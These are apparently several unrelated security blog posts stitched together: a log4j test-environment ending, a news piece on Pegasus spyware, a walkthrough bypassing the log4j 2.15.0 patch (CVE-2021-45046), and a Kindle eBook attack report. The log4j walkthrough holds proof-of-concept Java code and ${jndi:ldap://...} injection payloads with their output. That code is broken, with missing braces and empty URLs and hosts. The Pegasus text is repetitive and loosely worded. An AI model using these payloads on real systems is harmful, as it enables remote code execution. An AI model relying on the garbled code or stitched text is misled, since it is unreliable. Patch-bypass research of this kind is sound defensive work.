At this point, the last element needed to complete the basic research environment would be to obtain visibility over the network traffic. Ideally, that would be done with a custom LDAP/DNS/RMI server that would be able to provide a clear indication of the request and any metadata it carries, as well as control over what data is sent back to the vulnerable application; however, some of that could be achieved with a simple packet analyser that can show if a request is being made, even if nothing is sent back. For a lot of the cases that should be enough to prove if the application is (still) vulnerable.

We would recommend Wireshark as it will be easy to see the different protocols and it is very intuitive to apply filters (unlike tcpdump). With it running (do not forget to execute it with elevated privileges), listening on all interfaces, you should be able to rerun the POC script and see the network traffic, as shown below:

That concludes our small testing environment for log4j. In our next blog post, we would focus more on exploiting the vulnerability and research different patching methods.

The NSO Group used Israeli private spyware to target and target cellphones of human rights activities and journalists around the world. Data has revealed that Israeli spyware can infect smartphones without any user interaction (no “clicks”). Human rights advocates throughout the world have condemned the intrusive Israeli spyware that continues to endanger and jeopardize human lives. 

Source of the Spyware 

One extensive investigation reveals that the NSO Group, an Israeli IT contractor, is responsible for creating the invasive spyware known as Pegasus. This spyware program bypasses security parameters through a smartphone’s apps or operating system. Ultimately, spyware tracks personal and sensitive information.  

The Washington Post also reports that malicious Israeli spyware has been able to hack into cellphones of reputable public officials, human rights activists, and journalists without their consent. It would be fair to state that this intrusive nature of surveillance will have drastic consequences for free speech, data privacy, and human rights. 

In the Name of Cybersecurity Intelligence 

The stance of the NSO Group, however, is that it operates as a cybersecurity intelligence firm and supports government initiatives to prevent online crime and terrorism. But since the release of the investigation, the targeted individuals want the tech company to realize and recognize the issue. In fact, Human Rights Watch notes that the NSO Group has had affiliations with regressive regimes and public actors that undermine basic human rights.  

Forensic Analysis of Spyware 

The forensic analysis from Amnesty International paints a clear picture of the severity and implications of Israeli spyware. Amnesty International’s Security Lab finds that Israeli spyware compares stored data within smartphones through mistrustful URL links. It allows spyware to track cellphone activities when the user clicks on the URL. In some cases, however, there are hidden URLs so even visiting a previously compromised website would be considered sufficient to infect users (an attack known a “watering hole”). 

IOS Vulnerability and Past Accusations on the NSO Group 

Forbes highlights that Israeli spyware took advantage of iOS vulnerability and created a faux disguise of a system upgrade to invade a specific user’s mobile phone. At this point, the user is completely unaware of any spyware presence on his or her phone. Some time back, another investigation from WhatsApp also had accused the NSO Group in connection with illegal government surveillance and spyware.  

In fact, this research suggests that NSO has been the center point for many cybersecurity issues around the world. Digital human rights activists have raised the concern to make the Israeli tech firm accountable and roll out efforts to mitigate the impact of dangerous spyware. And that’s because Pegasus invasion into a personal smartphone is highly dangerous for human rights activists. 

Complete Breach of Privacy 

The Guardian reports that after the infiltration of the cellphone, hackers can access anything on the device. For instance, hackers can see sent and received messages, record screens, turn on the microphone, camera, and check GPS history and find the exact location of the user through GPS. These cyberattacks have the backing of oppressive regimes that want to curtail political opposition and free speech.  

Final Thoughts 

As of now, Pegasus has managed to compromise more than 50,000 cellphone devices. Data suggests that human rights activities from countries like India, Mexico, Saudi Arabia, and Azerbaijan were main targets and are now at high risk. To save the backers of human rights and ensure digital safety, global rights watch calls for more accountability from tech companies. In retrospect, Humans Rights Watch wants to make sure that regressive governments don’t silence dissidents by criminalizing online association and expression.  

The most recent event concerning Pegasus Spyware involves Apple. The tech manufacturer has managed to distribute a  patch for a critical vulnerability by rolling out security updates in all of its affected iPhones. Since the initial appearance of the malware, Pegasus has had mountainous coverage from international media and governments.  

Reports allege that Pegasus spyware is illegally spying on human rights activists, state heads, and journalists through their iPhones. With complete overdependence on the Internet and tech gadgets, the reliance on personal and commercial tasks is no longer safe.  

On a global scale, there is a collaborative investigation involving Pegasus spyware. Experts insist that it is one of the most dangerous attacks targeted towards smartphones. 

Roots of Pegasus 

Pegasus is the top-of-the-line spyware of the Israeli NSO Group. The company offers cyber intelligence solutions for state-backed law enforcement and intelligence agencies. The Washington Post confirms that the group offers its services to 60 different governments around the world.   

Mechanics of Pegasus 

Attackers send an email or text message to a targeted cell phone. Once the victim opens the message or email, the Pegasus Spyware gets access without any need for user interaction (i.e., clicks). The attacker can then download additional modules on the cell phone and transmit surveillance information.  

Whether it’s Android or iOS, Pegasus Spyware does not require a click to get be executed. It appears the spyware can infiltrate any type of phone from any location. Once the attacker gets remote access to the phone, it can activate virtual surveillance.  

Ultimately, Pegasus Spyware focuses on zero-day vulnerabilities. It is a vulnerability in the operating system of the smartphone that either hasn’t been fixed by the vendor or the user has not updated the device to apply the patches. In a span of few months, Pegasus Spyware has managed to exploit and backdoor millions of iPhones. At the of writing, Apple wants to roll out continuous updates in the software to avoid future attacks. 

What Exactly Pegasus Can DO? 

Once the spyware gets into the smartphone, there is practically nothing users can do to stop it. In particular, the attack can see all the photos, videos, emails, contact lists, SMSs, and call records. The attacker can put a GPS tracker on the phone to see the target movements.  

Reports also confirm that Pegasus spyware can activate the camera and microphone on the phone. In layman’s terms, it turns a cell phone into a surveillance tool. In the case of iPhones, attackers used Pegasus spyware to obtain administrative or root privileges. After that, it can do everything the owner can on the device. 

Targeted Software 

In the last two years, there has been a dramatic increase in malware attacks on different types of devices. Pegasus spyware uses a new infiltration technique that doesn’t require clicks or depend on pre-installed (vulnerable) software. It can exploit a smartphone without users’ knowledge.   

Final Thoughts 

I In late 2021, more details continue to startle tech experts about Pegasus spyware. Tech experts profess that the spyware is (almost) impossible to identify. Despite modern protections and the use of advanced electronic devices, Pegasus spyware leaves no trace of infiltration whatsoever. The new versions of the spyware, however, use the smartphone’s temporary memory.  

So, when users switch off their phones, any virtual trace of the spyware infiltration is completely gone. In retrospect, before leading cybersecurity specialists figure out how to detect the spyware, it is crucial to offer support to users who may be victims of this particular malware. 

Very shortly after the release of the patch for CVE-2021-44228, bundled by Apache as log4j 2.15.0, researchers already found ways of bypassing the fix: CVE-2021-45046. In particular, for less than a couple of days, a vulnerability was discovered, and while it was initially rated as 3.7, it was later elevated to 9.0. Needless to say, it captured our attention, especially considering the incident response work we were conducting at the time. It was important for us to understand the situation to better advise our clients. There were bits and pieces of research with some screenshots of the bypass circulating the Internet, but, at the time, we didn’t really find a vulnerable environment, with good explanation and well laid out pre-requisite for the bypass to work.

This blog goes over the research we performed from start to finish to produce a PoC and, in the process, to very precisely understand the conditions which have to be present to successfully bypass the patch to log4j in 2.15.0.

Tracking the Changes

To start with, we downloaded the vulnerable 2.14.1 log4j library, as well as the patched 2.15.0:

user@ubuntu:~/poc$ wget -q
user@ubuntu:~/poc$ tar zxf apache-log4j-2.14.1-src.tar.gz 
user@ubuntu:~/poc$ wget -q 
user@ubuntu:~/poc$ tar zxf apache-log4j-2.15.0-src.tar.gz 
user@ubuntu:~/poc$ ls -lh
total 22M
drwxr-xr-x 42 user user 4.0K Mar  6  2021 apache-log4j-2.14.1-src
-rw-rw-r--  1 user user  11M Mar 11  2021 apache-log4j-2.14.1-src.tar.gz
drwxr-xr-x 45 user user 4.0K Dec  9 10:19 apache-log4j-2.15.0-src
-rw-rw-r--  1 user user  12M Dec  9 15:46 apache-log4j-2.15.0-src.tar.gz

With both folders ready, we used meld to have an easier time finding what was different in the log4j-core folder:

Reviewing only the modified files, we noticed interesting changes in the JndiManager class:

private static final String LDAP = "ldap";
private static final String LDAPS = "ldaps";
private static final String JAVA = "java";
private static final List<String> permanentAllowedHosts = NetUtils.getLocalIps();
private static final List<String> permanentAllowedClasses = Arrays.asList(Boolean.class.getName(),
        Byte.class.getName(), Character.class.getName(), Double.class.getName(), Float.class.getName(),
        Integer.class.getName(), Long.class.getName(), Short.class.getName(), String.class.getName());
private static final List<String> permanentAllowedProtocols = Arrays.asList(JAVA, LDAP, LDAPS);
public synchronized <T> T lookup(final String name) throws NamingException {
  try {
    URI uri = new URI(name);
    if (uri.getScheme() != null) {
      if (!allowedProtocols.contains(uri.getScheme().toLowerCase(Locale.ROOT))) {
        LOGGER.warn("Log4j JNDI does not allow protocol {}", uri.getScheme());
        return null;
      if (LDAP.equalsIgnoreCase(uri.getScheme()) || LDAPS.equalsIgnoreCase(uri.getScheme())) {
        if (!allowedHosts.contains(uri.getHost())) {
          LOGGER.warn("Attempt to access ldap server not in allowed list");
          return null;
        Attributes attributes = this.context.getAttributes(name);
        if (attributes != null) {
          Map<String, Attribute> attributeMap = new HashMap<>();
          NamingEnumeration<? extends Attribute> enumeration = attributes.getAll();
          while (enumeration.hasMore()) {
            Attribute attribute =;
            attributeMap.put(attribute.getID(), attribute);
          Attribute classNameAttr = attributeMap.get(CLASS_NAME);
          if (attributeMap.get(SERIALIZED_DATA) != null) {
              if (classNameAttr != null) {
                String className = classNameAttr.get().toString();
                if (!allowedClasses.contains(className)) {
                  LOGGER.warn("Deserialization of {} is not allowed", className);
                  return null;
              } else {
                LOGGER.warn("No class name provided for {}", name);
                return null;
          } else if (attributeMap.get(REFERENCE_ADDRESS) != null || attributeMap.get(OBJECT_FACTORY) != null) {
            LOGGER.warn("Referenceable class is not allowed for {}", name);
            return null;
  } catch (URISyntaxException ex) {
    LOGGER.warn("Invalid JNDI URI - {}", name);
    return null;
  return (T) this.context.lookup(name);

Assuming we were able to reach the same lookup function, our payload would need to comply with two new conditions:

We managed to find a bit more information for these properties in the documentation:

ALLOWED_PROTOCOLS By default the JDNI Lookup only supports the java, ldap, and ldaps protocols or no protocol. Additional protocols may be supported by specifying them on the “log4j2.allowedJndiProtocols” property.

ALLOWED_HOSTS System property that adds host names or ip addresses that may be access by LDAP. When using LDAP only references to the local host name or ip address are supported along with any hosts or ip addresses listed in the “log4j2.allowedLdapHosts” property.

To verify this, we also looked at the source code. The default “allowed protocols” were:

private static final String LDAP = "ldap";
private static final String LDAPS = "ldaps";
private static final String JAVA = "java";
private static final List<String> permanentAllowedProtocols = Arrays.asList(JAVA, LDAP, LDAPS);

Whereas the default “allowed hosts” were listed in the getLocalIps function in log4j-core/src/main/java/org/apache/logging/log4j/core/util/

public static List<String> getLocalIps() {
  List<String> localIps = new ArrayList<>();
  try {
    final InetAddress addr = Inet4Address.getLocalHost();
    setHostName(addr, localIps);
  } catch (final UnknownHostException ex) {
    // Ignore this.
  try {
    final Enumeration<NetworkInterface> interfaces = NetworkInterface.getNetworkInterfaces();
    if (interfaces != null) {
      while (interfaces.hasMoreElements()) {
        final NetworkInterface nic = interfaces.nextElement();
        final Enumeration<InetAddress> addresses = nic.getInetAddresses();
        while (addresses.hasMoreElements()) {
          final InetAddress address = addresses.nextElement();
          setHostName(address, localIps);
  } catch (final SocketException se) {
      // ignore.
  return localIps;

Testing Assumptions

At this point, we had some assumptions as to what the patch has introduced. We decided to go ahead and try to confirm this with a practical test.

First, we modified the payload we wrote in our previous blog, to something easier to use:

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class POC {
    private static final Logger logger = LogManager.getLogger(POC.class);

    public static void main(String[] args) {
	if (args.length > 0){
		System.out.println("Using payload: " + args[0]);
	} else {
		System.out.println("No payload provided...");

After that we compiled it and ran it:

user@ubuntu:~/poc$ ./jdk1.8.0_171/bin/javac -cp apache-log4j-2.15.0-bin/log4j-core-2.15.0.jar:apache-log4j-2.15.0-bin/log4j-api-2.15.0.jar 
user@ubuntu:~/poc$ ./jdk1.8.0_171/bin/java -cp apache-log4j-2.15.0-bin/log4j-core-2.15.0.jar:apache-log4j-2.15.0-bin/log4j-api-2.15.0.jar:. POC '${jndi:dns://}'
Using payload: ${jndi:dns://}
15:06:32.118 [main] ERROR POC - ${jndi:dns://}

While we were not expecting to be seeing a DNS request in wireshark, there had to be at least an error indicating that our protocol and host were wrong, but there was nothing there.

Our assumption was wrong – there had to be more changes that we were not aware of. We tried with “log4j2.formatMsgNoLookups=true”, as this was mentioned in the patch, but it didn’t change anything. There was no DNS or TCP outbound or any additional errors. Because of this we went back to the documentation and stumbled on this:

Pattern layout no longer enables lookups within message text by default for cleaner API boundaries and reduced formatting overhead. The old ‘log4j2.formatMsgNoLookups’ which enabled this behavior has been removed as well as the ‘nolookups’ message pattern converter option. The old behavior can be enabled on a per-pattern basis using ‘%m{lookups}’.

A quick check with meld to /log4j-core/src/main/java/org/apache/logging/log4j/core/pattern/ revealed that there no longer was a flag that we can enable for lookups unless the option was included in the config file.

With this in mind, we had to create a config file with a custom pattern and use it:

<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="WARN">
        <Console name="Console" target="SYSTEM_OUT">
		<PatternLayout pattern="%d{HH:mm:ss.SSS} - $${ctx:myContext} - %msg%n" />
        <Root level="error">
            <AppenderRef ref="Console"/>
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.ThreadContext;

public class POC {
    private static final Logger logger = LogManager.getLogger(POC.class);

    public static void main(String[] args) {
	if (args.length > 0){
		System.out.println("Using payload: " + args[0]);
		ThreadContext.put("myContext", args[0]);
	} else {
		System.out.println("No payload provided...");

With these changes, we decided to test again with a slightly modified payload:

user@ubuntu:~/poc$ ./jdk1.8.0_171/bin/java -cp log4j-core-2.15.0.jar:log4j-api-2.15.0.jar:. POC '${jndi:ldap://'}
Using payload: ${jndi:ldap://}
2021-12-27 16:27:49,981 main WARN Attempt to access ldap server not in allowed list
16:27:49.976 - ${jndi:ldap://} - ${jndi:ldap://}

We then ran it again to verify that we can use the other enabled protocols as well:

user@ubuntu:~/poc$ ./jdk1.8.0_171/bin/java -cp log4j-core-2.15.0.jar:log4j-api-2.15.0.jar:. POC '${java:version}'
Using payload: ${java:version}
17:31:52.159 - Java version 1.8.0_171 - ${java:version}

At this point we knew that we are reaching the lookup function and it just became a matter of bypassing the newly introduced checks.

Final Challenge

We reached a big problem as the bypass we saw on Twitter ${jndi:ldap://} was not working for us. The application was crashing, complaining that it cannot resolve the host due to # in the domain. To go around this, we had to use a different DNS resolver which was not so picky about the special characters.

Here we have a PoC of this:

user@ubuntu:~/poc$ ./jdk1.8.0_171/bin/java -cp log4j-core-2.15.0.jar:log4j-api-2.15.0.jar:. \
>,sun POC '${jndi:ldap://}'
Using payload: ${jndi:ldap://}
2021-12-24 02:45:36,290 main WARN Error looking up JNDI resource [ldap://]. javax.naming.CommunicationException: [Root exception is]

With this, we were able to reproduce the attack and once again be in a position to achieve RCE.

Our research concluded that several important requirements have to be present to be able to bypass the patch of 2.15.0. The most important ones being 1) the ability to write within a context that 2) is used within a custom pattern in an application 3) using a broad DNS resolver.

In 2021, cybersecurity issues continue to dangle over the corporations. Throughout the COVID-19 pandemic crisis, many organizations had to make the transition to remote work. As a result, cybersecurity attacks are at an all-time. The rapid increase in malicious actors tends to breach and exploit valuable data for the sake of financial gain. 

In a line of new attacks, an Israeli cybersecurity service, Check Point, managed to spot a threat on Amazon. The malware infection was triggered through eBook clicks. After clicking on specific eBook links, users lost complete control of their Amazon account and as well as Kindle tablet. 

Complete Access Control 

The Israeli cybersecurity experts state that the security breach allowed hackers to get access to users’ tablets and gain control of their Amazon accounts. But other specialists also suggest that stealing users’ e-reader Amazon accounts may have been a tipping point. 

The demonstration of the entire findings by Check Point took place at DEFCON. It is no secret that FBI agents and top-tier cybersecurity companies throughout the world attend the annual DEFCON convention in Las Vegas. It is, after all, one of the largest cybersecurity conventions in the world.   

The findings at DEFCON revealed that hackers managed to breach and exploit Kindle. This infringement took place when users were processing a specific eBook and decided to click on it. In fact, it took seconds for the hackers to get access to the users’ Kindle. 

Examining the Attack Surface 

One cyber researcher points out that Kindle is a misunderstood product like other IoT devices. Contrary to misguided perception, Kindle does, in fact, need a high security to prevent and mitigate future breaches. In the end, all interconnected devices that connect through the internet need to be secure by design. 

Like most broadminded firms, Amazon has realized and recognized the severity of the breach. In fact, Amazon worked with the Israeli cybersecurity company to mitigate the impact of the current breach and took measures to avoid the occurrence of a similar attack in the foreseeable future. 

Planned and Calculated

This cybersecurity threat proves that hackers don’t hold back whether it’s a small firm or a giant online marketplace like Amazon. In fact, the target is always planned and calculated. As the tech continues o reshape modern workplace environments and organizations, it has become imperative to curb the known and unknown cyber threats. 

In this case, Amazon had the resources and dedicated IT team in place to thwart the cybersecurity attack. But there is still a need for organizations to spend more on cybersecurity solutions and become more responsive.